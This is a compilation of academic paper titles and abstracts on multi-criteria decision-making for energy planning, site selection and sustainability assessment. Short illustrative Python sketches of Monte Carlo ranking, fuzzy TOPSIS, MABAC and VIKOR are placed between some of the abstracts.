Power-Generation Technology Using a Linguistic Neutrosophic CODAS Method: A Case Study in Libya paper_content: Rapid increases in energy demand and the international drive to reduce carbon emissions from fossil fuels have led many oil-rich countries to diversify their energy portfolio and resources. Libya is one of these countries, and it has recently become interested in utilizing its renewable-energy resources in order to reduce financial and energy dependency on oil reserves.
This paper introduces an original multicriteria decision-making Pairwise-CODAS model in which the modification of the CODAS method was made using Linguistic Neutrosophic Numbers (LNN). The paper also suggests a new LNN Pairwise (LNN PW) model for determining the weight coefficients of the criteria developed by the authors. By integrating these models with linguistic neutrosophic numbers, it was shown that it is possible to a significant extent to eliminate subjective qualitative assessments and assumptions by decision makers in complex decision-making conditions. The LNN PW-CODAS model was tested and validated in a case study of the selection of optimal Power-Generation Technology (PGT) in Libya. Testing of the model showed that the proposed model based on linguistic neutrosophic numbers provides objective expert evaluation by eliminating subjective assessments when determining the numerical values of criteria. A sensitivity analysis of the LNN PW-CODAS model, carried out through 68 scenarios of changes in the weight coefficients, showed a high degree of stability of the solutions obtained in the ranking of the alternatives. The results were validated by comparison with LNN extensions of four multicriteria decision-making models. --- paper_title: Assessing the sustainability of renewable energy technologies using multi-criteria analysis: Suitability of approach for national-scale assessments and associated uncertainties paper_content: Multi-criteria analyses (MCAs) are often applied to assess and compare the sustainability of different renewable energy technologies or energy plans with the aim to provide decision-support for choosing the most sustainable and suitable options either for a given location or more generically. MCAs are attractive given the multi-dimensional and complex nature of sustainability assessments, which typically involve a range of conflicting criteria featuring different forms of data and information. However, the input information on which the MCA is based is often associated with uncertainties. The aim of this study was to develop and apply a MCA for a national-scale sustainability assessment and ranking of eleven renewable energy technologies in Scotland and to critically investigate how the uncertainties in the applied input information influence the result. The developed MCA considers nine criteria comprising three technical, three environmental and three socio-economic criteria. Extensive literature reviews for each of the selected criteria were carried out and the information gathered was used with MCA to provide a ranking of the renewable energy alternatives. The reviewed criteria values were generally found to have wide ranges for each technology. To account for this uncertainty in the applied input information, each of the criteria values were defined by probability distributions and the MCA run using Monte Carlo simulation. Hereby a probabilistic ranking of the renewable energy technologies was provided. We show that the ranking provided by the MCA in our specific case is highly uncertain due to the uncertain input information. We conclude that it is important that future MCA studies address these uncertainties explicitly, when assessing the sustainability of different energy projects to obtain more robust results and ensure better informed decision-making. 
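The Scottish renewable-technology assessment summarised immediately above treats each uncertain criterion value as a probability distribution and repeats the multi-criteria aggregation inside a Monte Carlo loop to obtain a probabilistic ranking. A minimal sketch of that idea, assuming a simple weighted-sum aggregation, uniform distributions, and two made-up alternatives, might look as follows; none of the numbers come from the cited study.

```python
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical (low, high) ranges for three benefit criteria per alternative.
ranges = {
    "tech A": [(0.4, 0.8), (0.2, 0.6), (0.5, 0.9)],
    "tech B": [(0.3, 0.9), (0.4, 0.7), (0.3, 0.6)],
}
weights = np.array([0.5, 0.3, 0.2])   # assumed criteria weights (sum to 1)

def sample_score(bounds):
    """One Monte Carlo draw of the weighted-sum score for one alternative."""
    x = np.array([rng.uniform(lo, hi) for lo, hi in bounds])
    return float(weights @ x)

n_runs = 10_000
wins = {name: 0 for name in ranges}
for _ in range(n_runs):
    scores = {name: sample_score(bounds) for name, bounds in ranges.items()}
    wins[max(scores, key=scores.get)] += 1

for name, count in wins.items():
    print(f"{name}: ranked first in {100 * count / n_runs:.1f}% of runs")
```

The output is a probability of each alternative being ranked first, which is exactly the kind of probabilistic ranking the cited study uses to expose how sensitive the result is to uncertain input information.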
--- paper_title: Optimal Siting of Charging Stations for Electric Vehicles Based on Fuzzy Delphi and Hybrid Multi-Criteria Decision Making Approaches from an Extended Sustainability Perspective paper_content: Optimal siting of electric vehicle charging stations (EVCSs) is crucial to the sustainable development of electric vehicle systems. Considering the defects of previous heuristic optimization models in tackling subjective factors, this paper employs a multi-criteria decision-making (MCDM) framework to address the issue of EVCS siting. The initial criteria for optimal EVCS siting are selected from extended sustainability theory, and the vital sub-criteria are further determined by using a fuzzy Delphi method (FDM), which consists of four pillars: economy, society, environment and technology perspectives. To tolerate vagueness and ambiguity of subjective factors and human judgment, a fuzzy Grey relation analysis (GRA)-VIKOR method is employed to determine the optimal EVCS site, which also improves the conventional aggregating function of fuzzy Vlsekriterijumska Optimizacijia I Kompromisno Resenje (VIKOR). Moreover, to integrate the subjective opinions as well as objective information, experts’ ratings and Shannon entropy method are employed to determine combination weights. Then, the applicability of proposed framework is demonstrated by an empirical study of five EVCS site alternatives in Tianjin. The results show that A3 is selected as the optimal site for EVCS, and sub-criteria affiliated with environment obtain much more attentions than that of other sub-criteria. Moreover, sensitivity analysis indicates the selection results remains stable no matter how sub-criteria weights are changed, which verifies the robustness and effectiveness of proposed model and evaluation results. This study provides a comprehensive and effective method for optimal siting of EVCS and also innovates the weights determination and distance calculation for conventional fuzzy VIKOR. --- paper_title: GIS-based onshore wind farm site selection using Fuzzy Multi-Criteria Decision Making methods. Evaluating the case of Southeastern Spain paper_content: When it is necessary to select the best location to implant an onshore wind farm, the criteria that influence the decision-making are not always numerical values but can also include qualitative criteria in the form of labels or linguistic variables which can be represented through fuzzy membership. In this paper, some fuzzy approaches of different Multi-Criteria Decision Making (MCDM) methods are combined in order to deal with a trending decision problem such as onshore wind farm site selection. More specifically, the Fuzzy Analytic Hierarchy Process (FAHP) is applied to obtain the weights of the criteria, whereas the Fuzzy Technique for Order of Preference by Similarity to Ideal Solution (FTOPSIS) is used to evaluate the alternatives. A Geographic Information System (GIS) is applied to obtain the database of the alternatives and criteria which are transformed in a fuzzy decision matrix through triangular fuzzy numbers. The coast of the Murcia Region, located at the Southeast of Spain, has been chosen as the study area to carry out this evaluation. 
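The GIS-based wind-farm study above combines FAHP weights with fuzzy TOPSIS, in which linguistic ratings are represented as triangular fuzzy numbers (TFNs). The sketch below is a deliberately simplified fuzzy TOPSIS variant for benefit criteria only, with crisp weights, vertex distances, and crisp proxies for the fuzzy ideal solutions; it illustrates the general technique rather than the exact formulation used in the cited papers, and all ratings are hypothetical.

```python
import numpy as np

def tfn_distance(m, n):
    """Vertex distance between two triangular fuzzy numbers m=(a,b,c) and n=(d,e,f)."""
    return np.sqrt(((np.array(m) - np.array(n)) ** 2).mean())

def fuzzy_topsis(ratings, weights):
    """Simplified fuzzy TOPSIS for benefit criteria.

    ratings: list over alternatives; each alternative is a list of TFNs (a, b, c).
    weights: crisp criteria weights summing to 1.
    Returns closeness coefficients (higher = closer to the fuzzy ideal).
    """
    R = np.array(ratings, dtype=float)            # shape (m, n, 3)
    c_star = R[:, :, 2].max(axis=0)               # per-criterion upper bound
    norm = R / c_star[None, :, None]              # linear scale normalisation
    V = norm * np.asarray(weights)[None, :, None] # weighted fuzzy matrix
    fpis = V[:, :, 2].max(axis=0)                 # fuzzy positive ideal (crisp proxy)
    fnis = V[:, :, 0].min(axis=0)                 # fuzzy negative ideal (crisp proxy)
    cc = []
    for i in range(V.shape[0]):
        d_plus = sum(tfn_distance(V[i, j], (fpis[j],) * 3) for j in range(V.shape[1]))
        d_minus = sum(tfn_distance(V[i, j], (fnis[j],) * 3) for j in range(V.shape[1]))
        cc.append(d_minus / (d_plus + d_minus))
    return cc

if __name__ == "__main__":
    # Hypothetical linguistic ratings already mapped to TFNs for two sites, three criteria.
    site_1 = [(5, 7, 9), (3, 5, 7), (7, 9, 10)]
    site_2 = [(3, 5, 7), (5, 7, 9), (5, 7, 9)]
    print(np.round(fuzzy_topsis([site_1, site_2], [0.5, 0.3, 0.2]), 3))
```

In the full method, cost criteria are normalised differently and the weights themselves may be fuzzy; those refinements are omitted here for brevity.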
--- paper_title: Sustainable energy planning by using multi-criteria analysis application in the island of Crete paper_content: The sustainable energy planning includes a variety of objectives, as the decision-making is directly related to the processes of analysis and management of different types of information (technological, environmental, economic and social). Very often, the traditional evaluation methods, such as the cost-benefit analysis and macro-economic indicators, are not sufficient to integrate all the elements included in an environmentally thorough energy plan. On the contrary the multiple criteria methods provide a tool, which is more appropriate to assemble and to handle a wide range of variables that is evaluated in different ways and thus offer valid decision support. This paper exploits the multi-criteria methodology for the sustainable energy planning on the island of Crete in Greece. A set of energy planning alternatives are determined upon the implementation of installations of renewable energy sources on the island and are assessed against economic, technical, social and environmental criteria identified by the actors involved in the energy planning arena. The study constitutes an exploratory analysis with the potential to assist decision makers responsible for regional energy planning, providing them the possibility of creating classifications of alternative sustainable energy alternatives. --- paper_title: Multi-criteria sustainability analysis of thermal power plant Kolubara-A Unit 2 paper_content: The paper presents a possible approach for creating business decisions based on multi-criteria analysis. Seven options for a possible revitalization of the thermal power plant “Kolubara”-A Unit No. 2 with energy indicators of sustainable development (EISD) are presented in this paper. The chosen EISD numerically express the essential features of the analyzed options, while the sustainability criteria indicate the option quality within the limits of these indicators. In this paper, the criteria for assessing the sustainability options are defined based on several aspects: economic, social, environmental and technological. In the process of assessing the sustainability of the considered options the Analysis and Synthesis of Parameters under Information Deficiency (ASPID) method was used. In this paper, the EISD show that production and energy consumption are closely linked to economic, environmental and other indicators, such as economic and technological development of local communities with employment being one of the most important social parameter. Multi-criteria analysis for the case study of the TPP “Kolubara”-A clearly indicated recommendations to decision makers on the choice of the best available options in dependence on the energy policy. --- paper_title: Multi-criteria ranking of energy generation scenarios with Monte Carlo simulation paper_content: Integrated Assessment Models (IAMs) are omnipresent in energy policy analysis. Even though IAMs can successfully handle uncertainty pertinent to energy planning problems, they render multiple variables as outputs of the modelling. Therefore, policy makers are faced with multiple energy development scenarios and goals. Specifically, technical, environmental, and economic aspects are represented by multiple criteria, which, in turn, are related to conflicting objectives. Preferences of decision makers need to be taken into account in order to facilitate effective energy planning. 
Multi-criteria decision making (MCDM) tools are relevant in aggregating diverse information and thus comparing alternative energy planning options. The paper aims at ranking European Union (EU) energy development scenarios based on several IAMs with respect to multiple criteria. By doing so, we account for uncertainty surrounding policy priorities outside the IAM. In order to follow a sustainable approach, the ranking of policy options is based on EU energy policy priorities: energy efficiency improvements, increased use of renewables, and reduction of GHG emissions at low mitigation costs. The ranking of scenarios is based on the estimates rendered by the two advanced IAMs relying on different approaches, namely TIAM and WITCH. The data are fed into the three MCDM techniques: the method of weighted aggregated sum/product assessment (WASPAS), the Additive Ratio Assessment (ARAS) method, and the technique for order preference by similarity to ideal solution (TOPSIS). As MCDM techniques allow assigning different importance to objectives, a sensitivity analysis is carried out to check the impact of perturbations in weights upon the final ranking. The rankings provided for the scenarios by different MCDM techniques diverge, first of all, due to the underlying assumptions of the IAMs. Results of the analysis provide valuable insights into the integrated application of both IAMs and MCDM models for developing energy policy scenarios and decision making in the energy sector. --- paper_title: Relational spatial database and multi-criteria decision methods for selecting optimum locations for photovoltaic power plants in the province of Seville (southern Spain) paper_content: This work aims to develop a methodology for selecting optimum locations for the construction of photovoltaic power plants. In order to achieve this, a data model is defined and a multi-criteria decision methodology, based on an analytical hierarchy process, is applied. In contrast to the previous studies, in which the spatial analysis was undertaken by a GIS managing different layers of information (grids, shapefiles, etc.), in this work the spatial analysis is carried out by means of an open-code spatial database management system: PostgreSQL-PostGIS. This system uses Structured Query Language to manage different tables in the context of relational spatial databases. The case study is the province of Seville (southern Spain), where this sort of facility already exists. The empirical analysis concludes that a large percentage of the province of Seville has an excellent potential for the installation of photovoltaic plants. The methodology allows the dynamic updating of criteria and parameters, as well as the reproducibility, scalability and automation of analyses carried out in other fields. --- paper_title: Solar PV power plant site selection using a GIS-AHP based approach with application in Saudi Arabia paper_content: Site selection for solar power plants is a critical issue for utility-size projects due to the significance of weather factors, proximity to facilities, and the presence of environmental protected areas. The primary goal of this research is to evaluate and select the best location for utility-scale solar PV projects using geographical information systems (GIS) and a multi-criteria decision-making (MCDM) technique. The model considers different aspects, such as economic and technical factors, with the goal of assuring maximum power achievement while minimizing project cost.
An analytical hierarchy process (AHP) is applied to weigh the criteria and compute a land suitability index (LSI) to evaluate potential sites. The LSI model groups sites into five categories: “least suitable,” “marginally suitable,” “moderately suitable,” “highly suitable” and “most suitable.” A case study for Saudi Arabia is provided. Real climatology and legislation data, such as roads, mountains, and protected areas, are utilized in the model. The solar analyst tool in ArcGIS software is employed to calculate the solar insolation across the entire study area using actual atmospheric parameters. The air temperature map was created from real dispersed monitoring sensors across Saudi Arabia using interpolation. The overlaid result map showed that 16% (300,000 km2) of the study area is promising and suitable for deploying utility-size PV power plants, while the most suitable areas lie in the north and northwest of Saudi Arabia. It has been found that the suitable lands follow the pattern of proximity to main roads, transmission lines, and urban cities. More than 80% of the suitable areas had a moderate to high LSI. The integration of GIS with MCDM methods has emerged as a highly useful technique to systematically deal with rich geographical data over vast areas and to weight the importance of criteria when identifying the best sites for solar power plants. --- paper_title: Assessing the global sustainability of different electricity generation systems paper_content: A model is presented for assessing the global sustainability of power plants. It uses requirement trees, value functions and the analytic hierarchy process. The model consists of 27 parameters and makes it possible to obtain a sustainability index for each conventional or renewable energy plant, throughout its life-cycle. Here the aim is to make society aware of the sustainability level for each type of power system. As a result, decision making can be done with greater objectivity in both the public and private sectors. The model can be useful for engineers, researchers and, in general, decision makers in the energy policy field. With the exception of biomass fuels, the results obtained reinforce the idea that renewable energies make a greater contribution to sustainable development than their conventional counterparts. Renewable energies have a sustainability index that varies between 0.39 and 0.80; 0 and 1 being the lowest and highest contribution to sustainability, respectively. On the other hand, conventional power plants obtained results that fall between 0.29 and 0.57. High temperature solar-thermal plants, wind farms, photovoltaic solar plants and mini-hydroelectric power plants occupy the first four places, in this order. --- paper_title: Application of multi-criteria decision analysis in design of sustainable environmental management system framework paper_content: Abstract Proactive environmental management initiatives such as pollution prevention, cleaner production and sustainability are inherently multi-objective processes that require joint considerations of environmental, industrial, economic and social criteria in all stages of decision making. The success of such initiatives, however, depends on the solidity and the relevance of their strategic frameworks.
This paper proposes strategic positioning of pollution prevention and clean production projects via design of a sustainable environmental management system (SEMS) that is responsive to regulatory requirements, and is relevant to industry culture and business structure. Built on the traditional and familiar environmental management system platform and the requirements of the multi-criteria decision making models ELECTRE III, the SEMS is capable of supporting design and implementation of defensible solutions to environmental problems industry face today according to sustainability criteria. The ELECTRE III model was selected as an integral part of the framework due to its ease of application, flexibility in design and selection of performance criteria, and capability to identify the best management solutions by giving an order of preference to multiple alternatives. The proposed SEMS framework is also in line with the Rio+20 sustainable development goals, objectives and guidelines that call for action and result-oriented strategies and institutional frameworks that could account for multiple stakeholders' key issues while suggesting environmental solutions according to the three dimensions of sustainable development. A case study that demonstrates the management of waste streams at a manufacturer of energy drinks and diet bars is provided to demonstrate how the SEMS can be designed and implemented. --- paper_title: Development of a decision support system for the study of an area after the occurrence of forest fire paper_content: There is a great diffusion of modern information systems in all areas of science. In the case of forestry, new information tools have emerged during the last 15 years which have helped to improve the work of foresters. Decision support systems (DSSs) are applications which are designed to help managers in the task of decision making, by accelerating the relevant decision-making processes, while simultaneously focusing on the conservation of natural, financial and human resources. In this paper, we describe the development of a DSS which has been designed to help managers in the process of decision making, in relation to areas that have been burnt by forest fires. In addition, the above system also provides the user with the capacity to create hypothetical (what-if) scenarios in order to achieve the best form of intervention. The relevant software was created using Visual C# and the weights of the various parameters were calculated using multi-criteria decision analysis. --- paper_title: Sustainability Decision Support Framework for Industrial System Prioritization paper_content: A multicriteria decision-making methodology for the sustainability prioritization of industrial systems is proposed. The methodology incorporates a fuzzy Analytic Hierarchy Process method that allows the users to assess the soft criteria using linguistic terms. A fuzzy Analytic Network Process method is used to calculate the weights of each criterion, which can tackle the interdependencies and interactions among the criteria. The Preference Ranking Organization Method for Enrichment Evaluation approach is used to prioritize the sustainability sequence of the alternative systems. Moreover, a sensitivity analysis method was developed to investigate the most critical and sensitive criteria. The developed methodology was illustrated by a case study to rank the sustainability of five alternative hydrogen production technologies. 
The advantages of the developed methodology over the previous approaches were demonstrated by comparing the results determined by the proposed framework with those determined using the previous approaches. --- paper_title: Evaluation and selection of materials for particulate matter MEMS sensors by using hybrid MCDM methods paper_content: Air pollution poses serious problems as global industrialization continues to thrive. Since air pollution has grave impacts on human health, industry experts are starting to fathom how to integrate particulate matter (PM) sensors into portable devices; however, traditional micro-electro-mechanical systems (MEMS) gas sensors are too large. To overcome this challenge, experts from industry and academia have recently begun to investigate replacing the traditional etching techniques used on MEMS with semiconductor-based manufacturing processes and materials, such as gallium nitride (GaN), gallium arsenide (GaAs), and silicon. However, studies showing how to systematically evaluate and select suitable materials are rare in the literature. Therefore, this study aims to propose an analytic framework based on multiple criteria decision making (MCDM) to evaluate and select the most suitable materials for fabricating PM sensors. An empirical study based on recent research was conducted to demonstrate the feasibility of our analytic framework. The results provide an invaluable future reference for research institutes and providers. --- paper_title: A Hybrid MCDM Approach for Strategic Project Portfolio Selection of Agro By-Products paper_content: Due to the increasing size of the population, society faces several challenges for sustainable and adequate agricultural production, quality, distribution, and food safety in the strategic project portfolio selection (SPPS). The initial adaptation of strategic portfolio management of genetically modified (GM) Agro by-products (Ab-Ps) is a huge challenge in terms of processing the agro food product supply-chain practices in an environmentally nonthreatening way. As a solution to the challenges, the socio-economic characteristics for SPPS of GM food purchasing scenarios are studied. Evaluation and selection of the GM agro portfolio management is a dynamic issue due to physical and immaterial criteria, and is addressed with a hybrid multiple criteria decision making (MCDM) approach combining modified grey Decision-Making Trial and Evaluation Laboratory (DEMATEL), Multi-Attributive Border Approximation area Comparison (MABAC) and sensitivity analysis. Evaluation criteria are grouped into social, differential and beneficial clusters, and the modified DEMATEL procedure is used to derive the criteria weights. The MABAC method is applied to rank the strategic project portfolios according to the aggregated preferences of decision makers (DMs). The usefulness of the proposed research framework is validated with a case study. The GM by-products are found to be the best portfolio. Moreover, this framework can unify the policies of agro technological improvement, corporate social responsibility (CSR) and agro export promotion.
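The agro-portfolio study above ranks alternatives with MABAC, which measures each alternative's distance from a border approximation area. A compact sketch of the basic crisp MABAC steps is given below; the decision matrix, weights and benefit/cost labels are illustrative assumptions, and the cited paper actually uses a grey-number extension of the method rather than this plain version.

```python
import numpy as np

def mabac(X, weights, benefit):
    """Basic (crisp) MABAC ranking.

    X: (m x n) decision matrix; weights: criteria weights summing to 1;
    benefit: boolean list, True for benefit criteria, False for cost criteria.
    Returns total distances from the border approximation area (higher = better).
    """
    X = np.asarray(X, dtype=float)
    x_min, x_max = X.min(axis=0), X.max(axis=0)
    # Min-max normalisation, reversed for cost criteria.
    R = np.where(benefit,
                 (X - x_min) / (x_max - x_min),
                 (X - x_max) / (x_min - x_max))
    V = np.asarray(weights) * (R + 1.0)          # weighted normalised matrix
    G = np.prod(V, axis=0) ** (1.0 / X.shape[0]) # border approximation area vector
    Q = V - G                                    # distances from the border area
    return Q.sum(axis=1)

if __name__ == "__main__":
    # Hypothetical portfolios scored on two benefit criteria and one cost criterion.
    X = [[7, 0.6, 120],
         [9, 0.4, 150],
         [6, 0.8, 100]]
    s = mabac(X, [0.4, 0.4, 0.2], [True, True, False])
    print("MABAC scores:", np.round(s, 3), "best alternative index:", int(np.argmax(s)))
```

Alternatives with positive total distance lie above the border approximation area and are the stronger candidates; ranking is simply by descending score.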
--- paper_title: Key performance indicators (KPIs) and priority setting in using the multi-attribute approach for assessing sustainable intelligent buildings paper_content: The main objectives of this paper are to: firstly, identify key issues related to sustainable intelligent buildings (environmental, social, economic and technological factors) and develop a conceptual model for the selection of the appropriate KPIs; secondly, critically test stakeholders' perceptions and values of selected KPIs for intelligent buildings; and thirdly, develop a new model for measuring the level of sustainability for sustainable intelligent buildings. This paper uses a consensus-based model (Sustainable Built Environment Tool, SuBETool), which is analysed using the analytical hierarchical process (AHP) for multi-criteria decision-making. The use of the multi-attribute model for priority setting in the sustainability assessment of intelligent buildings is introduced. The paper commences by reviewing the literature on sustainable intelligent buildings research and presents a pilot study investigating the problems of complexity and subjectivity. This study is based upon a survey of perceptions held by selected stakeholders and the value they attribute to selected KPIs. It is argued that the benefit of the newly proposed model (SuBETool) is as a tool for ‘comparative’ rather than absolute measurement. It has the potential to provide useful lessons from current sustainability assessment methods for the strategic future of sustainable intelligent buildings, in order to improve a building's performance and to deliver objective outcomes. Findings of this survey enrich the field of intelligent buildings in two ways. Firstly, it gives a detailed insight into the selection of sustainable building indicators, as well as their degree of importance. Secondly, it critically tests stakeholders' perceptions and values of selected KPIs for intelligent buildings. It is concluded that the priority levels for selected criteria are largely dependent on the integrated design team, which includes the client, architects, engineers and facilities managers. --- paper_title: Environmental sustainability benchmarking of the U.S. and Canada metropoles: An expert judgment-based multi-criteria decision making approach paper_content: Abstract In this paper, environmental sustainability performance assessment of 27 U.S. and Canada metropoles is addressed. A four-step hierarchical fuzzy multi-criteria decision-making approach is developed. In the first step, the proposed methodology is established by determining the sustainability performance indicators (a total of 16 sustainability indicators are considered), collecting the data and contacting experts from academia, U.S. government agencies and within the industry. In the second step, experts are contacted and the entire list is finalized; sustainability performance evaluation forms are delivered; and then expert judgment results are obtained and quantified, respectively. In the third step, the proposed Multi-criteria Intuitionistic Fuzzy Decision Making model is developed and sustainability performance scores are quantified by using the collected data, the multi-criteria decision making model and the sustainability indicator weights obtained from the expert judgment phase. In the final step, the sustainability scores and rankings of the 27 metropoles, results analysis and discussions, and statistical highlights about the research findings are provided.
Results indicated that the average sustainability performance score is found to be 0.524 on a scale between 0 and 1. The metropole with the greatest sustainability performance score is found to be New York with 0.703 and the poorest performing city is identified as Cleveland with 0.394. The results of the statistical analysis indicate that the greatest significant correlations are obtained with carbon dioxide (CO2) emissions per person (−0.749, a significant negative correlation with the sustainability performance score) and share of workers traveling by public transport (+0.753, a significant positive correlation with the sustainability performance score). Therefore, CO2 emissions and public transport are found to have the most significant impact on the sustainability scores. --- paper_title: Compression ignition engine performance modelling using hybrid MCDM techniques for the selection of optimum fish oil biodiesel blend at different injection timings paper_content: Abstract The increasing demand for energy due to population growth and rising living standards has led to considerable use of fossil fuels, which causes environmental pollution and depletion of fossil fuel reserves. Biodiesel proves to be a good alternative to fossil fuels. But the sustainability of biodiesel is the key factor in determining its suitability as a fuel in diesel engines. This requires identification of the proper blend of biodiesel and diesel to meet efficiency, engine suitability and environmental acceptability requirements. Alternative fuel blend evaluation in IC engine fuel technologies is a very important strategic decision involving a balance between a number of criteria, such as performance, emission and combustion parameters, and opinions from different decision makers such as IC engine experts. Hence, it is an MCDM problem. This paper describes the application of hybrid Multi Criteria Decision Making (MCDM) techniques for the selection of the optimum biodiesel blend in an IC engine. FAHP-TOPSIS, FAHP-VIKOR and FAHP-ELECTRE are the three methods that are used to evaluate the best blend. The performances of these MCDM methods are also compared with each other. Here, FAHP is used to determine the relative weights of the criteria, whereas TOPSIS, VIKOR and ELECTRE are used for obtaining the final ranking of alternatives. A single cylinder, constant speed and direct injection diesel engine with a rated output of 4.4 kW is used for exploratory analysis of the evaluation criteria at different load conditions. Diesel, B20, B40, B60, B80 and B100 fuel blends are prepared by varying the proportion of biodiesel. Similarly, Brake thermal efficiency (BTE), Exhaust gas temperature (EGT), Oxides of Nitrogen (NOx), Smoke, Hydrocarbon (HC), Carbon monoxide (CO), Carbon dioxide (CO2), Ignition Delay, Combustion Duration and Maximum Rate of Pressure Rise are considered as the evaluation criteria. The ranking of alternatives obtained by FAHP-TOPSIS, FAHP-VIKOR and FAHP-ELECTRE is B20 > Diesel > B40 > B60 > B80 > B100 for 21°bTDC and 24°bTDC, and Diesel > B20 > B40 > B60 > B80 > B100 for 27°bTDC. It shows that B20 is ranked first for 21°bTDC and 24°bTDC and second for 27°bTDC injection timing. Hence, it is concluded that mixing 20% biodiesel with diesel is a good replacement for diesel. This paper provides new insight into applying MCDM techniques to evaluate the best fuel blend by decision makers such as engine manufacturers and R&D engineers, to meet fuel economy and emission norms and to empower the green revolution.
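The biodiesel-blend study above ranks alternatives with TOPSIS, VIKOR and ELECTRE under FAHP criteria weights. As one example of these ranking steps, the sketch below implements basic crisp VIKOR; the decision matrix (efficiency as a benefit criterion, two emission measures as cost criteria), the weights and the compromise parameter v = 0.5 are assumptions for illustration, not values from the cited work.

```python
import numpy as np

def vikor(X, weights, benefit, v=0.5):
    """Basic VIKOR: returns (S, R, Q); smaller Q indicates a better compromise."""
    X = np.asarray(X, dtype=float)
    w = np.asarray(weights, dtype=float)
    best = np.where(benefit, X.max(axis=0), X.min(axis=0))    # ideal value per criterion
    worst = np.where(benefit, X.min(axis=0), X.max(axis=0))   # anti-ideal value
    D = w * (best - X) / (best - worst)      # weighted normalised regrets
    S = D.sum(axis=1)                        # group utility (sum of regrets)
    R = D.max(axis=1)                        # maximum individual regret
    Q = (v * (S - S.min()) / (S.max() - S.min())
         + (1 - v) * (R - R.min()) / (R.max() - R.min()))
    return S, R, Q

if __name__ == "__main__":
    # Hypothetical fuel blends rated on efficiency (benefit) and two emissions (cost).
    X = [[30.5, 4.1, 0.08],
         [29.8, 3.2, 0.06],
         [28.9, 2.7, 0.05]]
    S, R, Q = vikor(X, [0.5, 0.3, 0.2], [True, False, False])
    print("Q:", np.round(Q, 3), "best (lowest Q):", int(np.argmin(Q)))
```

The full VIKOR procedure also checks acceptable-advantage and acceptable-stability conditions before declaring a single compromise solution; those checks are omitted here for brevity.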
--- paper_title: Measuring systems sustainability with multi-criteria methods: A critical review paper_content: Determining the sustainability of a system (e.g. through a criteria and indicators approach) has been the focus of research in many branches of science. Frequently, this research used multiple criteria decision making techniques. In this work, we analyze and critically assess the literature published on these topics. For this purpose, a set of 271 papers appearing in the ISI Web of Science database has been studied. The results show that these techniques have been applied to a great variety of problems, levels, and sectors, related to sustainability. Thus, up to 15 multiple criteria decision making techniques, which have been applied in 4 or more papers, have been identified. Those techniques have been grouped in 5 large clusters; the two most used being those called Analytic Hierarchical Process and Weighted Arithmetic Mean. On the other hand, in this work it has been verified that the use of multiple criteria decision making techniques hybridized with group decision-making techniques is quite common, and the use of both techniques for assessing sustainability problems has risen over the last few years. The aim of this hybridization process consists of including in the analysis the preferences of the stakeholders with respect to the indicators initially suggested. Finally, it has been seen that during the past few years there has been a great proliferation of works aggregating sustainability criteria by using this type of tool, which is undoubtedly a sign of the paramount importance of these techniques in this highly pluridisciplinary context. --- paper_title: Sustainable Assessment of Alternative Sites for the Construction of a Waste Incineration Plant by Applying WASPAS Method with Single-Valued Neutrosophic Set paper_content: The principles of sustainability have become particularly important in the construction, real estate maintenance sector, and all areas of life in recent years. The one of the major problem of urban territories that domestic and construction waste of generated products cannot be removed automatically. --- paper_title: Urban sewage sludge, sustainability, and transition for Eco-City: Multi-criteria sustainability assessment of technologies based on best-worst method paper_content: The treatment of urban sewage sludge is of vital importance for mitigating the risks of environmental contaminations, and the negative effects on human health. However, there are usually various different technologies for the treatment of urban sewage sludge; thus, it is difficult for decision-makers/stakeholders to select the most sustainable technology among multiple alternatives. This study aims at developing a generic multi-criteria decision support framework for sustainability assessment of the technologies for the treatment of urban sewage sludge. A generic criteria system including both hard and soft criteria in economic, environmental, social and technological aspects was developed for sustainability assessment. The improved analytic hierarchy process method, namely Best-Worst method, was employed to determine the weights of the criteria and the relative priorities of the technologies with respect to the soft criteria. Three MCDM methods including the sum weighted method, digraph model, and TOPSIS were used to determine sustainability sequence of the alternative technologies for the treatment of urban sewage sludge. 
Three technologies including landfilling, composting, and drying incineration have been studied using the proposed framework. The sustainability sequence of these three technologies determined by these three methods was obtained, and finally the priority sequence was determined as landfilling, drying incineration and composting in descending order. --- paper_title: SCORE: a novel multi-criteria decision analysis approach to assessing the sustainability of contaminated land remediation. paper_content: The multi-criteria decision analysis (MCDA) method provides for a comprehensive and transparent basis for performing sustainability assessments. Development of a relevant MCDA-method requires consideration of a number of key issues, e.g. (a) definition of assessment boundaries, (b) definition of performance scales, both temporal and spatial, (c) selection of relevant criteria (indicators) that facilitate a comprehensive sustainability assessment while avoiding double-counting of effects, and (d) handling of uncertainties. Adding to the complexity is the typically wide variety of inputs, including quantifications based on existing data, expert judgements, and opinions expressed in interviews. The SCORE (Sustainable Choice Of REmediation) MCDA-method was developed to provide a transparent assessment of the sustainability of possible remediation alternatives for contaminated sites relative to a reference alternative, considering key criteria in the economic, environmental, and social sustainability domains. The criteria were identified based on literature studies, interviews and focus-group meetings. SCORE combines a linear additive model to rank the alternatives with a non-compensatory approach to identify alternatives regarded as non-sustainable. The key strengths of the SCORE method are as follows: a framework that at its core is designed to be flexible and transparent; the possibility to integrate both quantitative and qualitative estimations on criteria; its ability, unlike other sustainability assessment tools used in industry and academia, to allow for the alteration of boundary conditions where necessary; the inclusion of a full uncertainty analysis of the results, using Monte Carlo simulation; and a structure that allows preferences and opinions of involved stakeholders to be openly integrated into the analysis. A major insight from practical application of SCORE is that its most important contribution may be that it initiates a process where criteria otherwise likely ignored are addressed and openly discussed between stakeholders. --- paper_title: A sensitivity analysis in MCDM problems: A statistical approach paper_content: This study provides a model for result consistency evaluation of multi-criteria decision-making (MCDM) methods and selection of the optimal one. The study presents the results of an analysis of the sensitivity of decision-making based on the rank methods: SAW, MOORA, VIKOR, COPRAS, CODAS, TOPSIS, D’IDEAL, MABAC, PROMETHEE-I,II, ORESTE-II with variations in the elements in the decision matrix within a given error (imprecision). It is suggested to use multiple simulations of the estimated elements of the decision matrix within a given error for calculating the ranks of the alternatives, which allows statistical estimates of the ranks to be obtained. 
Based on the statistics of the simulations, decision-making can be carried out not only on the statistics of alternatives having rank I but also on the statistics of alternatives having the largest total for ranks I and II, or ranks I, II and III. This is especially true when the difference in rank values is not large and is distributed evenly among the first three ranks. The calculation results for the task of selecting the adequate location of 8 objects by 11 criteria are presented here. The main result shows that the alternatives having ranks I, II and III for some ranking methods are not distinguishable within the selected error value of the elements in the decision matrix. A quantitative analysis can only narrow the number of effective alternatives for a final decision. A statistical analysis makes it possible to estimate the number of cases in which an alternative has priority. Additional criteria that take into account both aggregate priorities and the availability of possible priorities for other alternatives with small variations in the decision matrix provide additional important information for the decision-maker. ---
